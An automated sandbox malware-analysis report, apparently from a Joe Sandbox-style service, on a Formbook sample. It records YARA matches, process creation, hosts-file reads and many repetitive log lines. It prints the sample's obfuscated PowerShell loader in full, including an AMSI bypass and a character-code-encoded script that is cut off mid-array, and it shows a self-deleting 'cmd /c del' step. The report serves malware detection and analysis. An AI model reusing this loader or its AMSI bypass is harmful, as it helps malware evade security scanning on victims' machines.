Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02ABEBB0	19_2_02ABEBB0
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02A9B090	19_2_02A9B090
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02B41002	19_2_02B41002
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02A9841F	19_2_02A9841F
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02A9D5E0	19_2_02A9D5E0
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02A80D20	19_2_02A80D20
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02AA4120	19_2_02AA4120
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02A8F900	19_2_02A8F900
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02B51D55	19_2_02B51D55
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_001BD84E	19_2_001BD84E
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_001BE066	19_2_001BE066
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_001BE94D	19_2_001BE94D
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_001BDA23	19_2_001BDA23
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_001BDB36	19_2_001BDB36
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_001A2D90	19_2_001A2D90
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_001A2D89	19_2_001A2D89
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_001A9E30	19_2_001A9E30
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_001BBE22	19_2_001BBE22
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_001A2FB0	19_2_001A2FB0

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\calc.exe	Code function: String function: 033AB150 appears 35 times
Source: C:\Windows\SysWOW64\help.exe	Code function: String function: 02A8B150 appears 32 times

PE file contains more sections than normal

Source: s2rsXUiUn8.exe

Static PE information: Number of sections : 11 > 10

Yara signature match

Source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.evad.winEXE@10/6@5/2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20210722

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5436:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3084:120:WilError_01

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\s2rsXUiUn8.exe 'C:\Users\user\Desktop\s2rsXUiUn8.exe'
Source: C:\Users\user\Desktop\s2rsXUiUn8.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\s2rsXUiUn8.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13\|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\calc.exe {path}
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
Source: C:\Windows\SysWOW64\help.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\WINDOWS\syswow64\calc.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\s2rsXUiUn8.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13\|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\calc.exe {path}	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\WINDOWS\syswow64\calc.exe'	Jump to behavior

Source: s2rsXUiUn8.exe	Static PE information: section name: .xdata
Source: s2rsXUiUn8.exe	Static PE information: section name: .vmp0
Source: s2rsXUiUn8.exe	Static PE information: section name: .cobf

Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_0041682D push es; retf	9_2_00416836
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_0040102E push esp; iretd	9_2_0040102F
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_0041A1B1 push ecx; iretd	9_2_0041A1B9
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_0041CEF2 push eax; ret	9_2_0041CEF8
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_0041CEFB push eax; ret	9_2_0041CF62
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_0041CEA5 push eax; ret	9_2_0041CEF8
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_0041CF5C push eax; ret	9_2_0041CF62
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_004177B7 push ebp; retf	9_2_004177B8
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033FD0D1 push ecx; ret	9_2_033FD0E4
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02ADD0D1 push ecx; ret	19_2_02ADD0E4
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_001B682D push es; retf	19_2_001B6836
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_001BA1B1 push ecx; iretd	19_2_001BA1B9
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_001BD4A2 push FFFFFFB8h; retf	19_2_001BD4BC
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_001BCEA5 push eax; ret	19_2_001BCEF8
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_001BCEFB push eax; ret	19_2_001BCF62
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_001BCEF2 push eax; ret	19_2_001BCEF8
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_001BCF5C push eax; ret	19_2_001BCF62
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_001B77B7 push ebp; retf	19_2_001B77B8

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
